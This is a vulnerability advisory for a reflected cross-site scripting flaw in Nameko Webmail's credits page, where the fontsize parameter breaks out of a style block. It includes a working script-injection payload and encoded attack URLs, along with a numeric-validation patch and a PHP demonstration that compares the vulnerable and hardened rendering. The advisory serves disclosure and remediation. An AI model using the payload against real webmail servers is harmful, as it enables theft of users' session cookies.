Nameko Webmail <= 0.10.146 Cross Site Scripting

* Nameko Webmail XSS Vulnerability on version <= 0.10.146

* ========================================================

*

* Homepage: http://www.wizshelf.org/nameko/

* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)

* Follow me: http://www.linkedin.com/in/andreamenin

*

* ========================================================

Introduction:

-------------

Nameko is a set of tools for working with e-mail in PHP.
The core of Nameko is a set of classes for retrieving mail
from a POP3 server and parsing it to extract the body (both
plain text and HTML, if included) and the attachments.
NamekoWebmail, a full-featured webmail, is included.

Description:

------------

The XSS vulnerability is located on the credits page, where
it is possible to change the font size through an HTTP GET
parameter (e.g. fontsize=11). The value of "fontsize" is
written unfiltered into a <style> block, so by closing that
block with "}</style>" an attacker can inject any JavaScript
inside a <script> tag (and then reopen a <style> block so the
rest of the page still renders).

The URL that triggers the XSS looks like this (URL-decoded):

?fontsize=11; }</style><script>alert(document.cookie)</script><style>BODY { font-size:66

XSS URL:

--------

http[s]://** victim host **/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66

or

http[s]://** victim host **/?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66

Patch:

------

It is possible to patch this by adding a check on the $_GET['fontsize'] variable,
making sure that it is numeric only before it is stored in the session.

// On file nameko.php (line 93):

if($_GET[fontsize]) $_SESSION[FONTSIZE]=$_GET[fontsize];

// should be replaced with something like this. The keys are quoted (bare
// fontsize/FONTSIZE are undefined constants in PHP), the check only runs when
// the parameter is present, so a font size already stored in the session is
// kept on requests that do not carry it, and only a two-digit value is accepted:

if (isset($_GET['fontsize'])) {
    if (preg_match('/^[0-9]{2}$/', $_GET['fontsize'])) {
        $_SESSION['FONTSIZE'] = (int) $_GET['fontsize'];
    } else {
        $_SESSION['FONTSIZE'] = 11;
    }
}
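To show why the fix has to be a strict numeric check rather than HTML escaping, here is an added PHP example. It is not code from nameko.php: the <style> template, the function names and the context check are assumptions modelled on the payload above. It renders the fontsize parameter the vulnerable way and the hardened way and feeds the advisory's payload through both:

```php
<?php
// Added example, not code from nameko.php: the <style> template below is an
// assumption modelled on the advisory's payload, and the function names are ours.

// Vulnerable rendering: the raw GET value is interpolated straight into CSS,
// which is what lets "11; }</style><script>...</script><style>BODY { font-size:66"
// close the style element and open a script element.
function render_style_vulnerable(array $get): string
{
    $fontsize = isset($get['fontsize']) ? $get['fontsize'] : 11;
    return "<style>BODY { font-size:{$fontsize}pt; }</style>";
}

// Hardened input check, matching the advisory's patch: accept exactly two digits,
// otherwise fall back to the default. Returning an int guarantees that nothing
// but digits can ever reach the CSS.
function validate_fontsize($value, int $default = 11): int
{
    if (is_string($value) && preg_match('/^[0-9]{2}$/', $value)) {
        return (int) $value;
    }
    return $default;
}

function render_style_hardened(array $get): string
{
    $fontsize = validate_fontsize($get['fontsize'] ?? null);
    return "<style>BODY { font-size:{$fontsize}pt; }</style>";
}

// True when the output still holds exactly one <style> element and no <script>
// element, i.e. the CSS context was not broken out of.
function style_context_intact(string $html): bool
{
    return substr_count(strtolower($html), '</style>') === 1
        && stripos($html, '<script') === false;
}

// Constructed input: the URL-decoded value of fontsize from the advisory's XSS URL.
$payload = '11; }</style><script>alert(document.cookie)</script><style>BODY { font-size:66';
$attack = ['fontsize' => $payload];
$normal = ['fontsize' => '14'];

$vuln = render_style_vulnerable($attack);
$safe = render_style_hardened($attack);

echo "vulnerable: $vuln\n";
echo "hardened:   $safe\n";
echo "vulnerable context intact: " . var_export(style_context_intact($vuln), true) . "\n";
echo "hardened context intact:   " . var_export(style_context_intact($safe), true) . "\n";
echo "legitimate value:          " . render_style_hardened($normal) . "\n";

// Why not just htmlspecialchars()? It would neutralise the </style> break-out,
// but a value such as "11; } BODY { display:none; " contains no angle brackets
// at all and still injects attacker-controlled CSS rules. Inside a <style>
// block the only safe approach is to allow nothing but the expected numeric value.
```

Run it with php from the command line: the vulnerable output carries the injected <script> element, while the hardened output renders font-size:11pt for the payload and font-size:14pt for the legitimate value. The check is deliberately stricter than "numeric": PHP's is_numeric() accepts strings such as "1e3" or " 11", none of which belong in a CSS declaration.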

CREDITS:

---------

This vulnerability was discovered

by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)

LEGAL NOTICES:

---------------

The Author accepts no responsibility for any damage

caused by the use or misuse of this information.
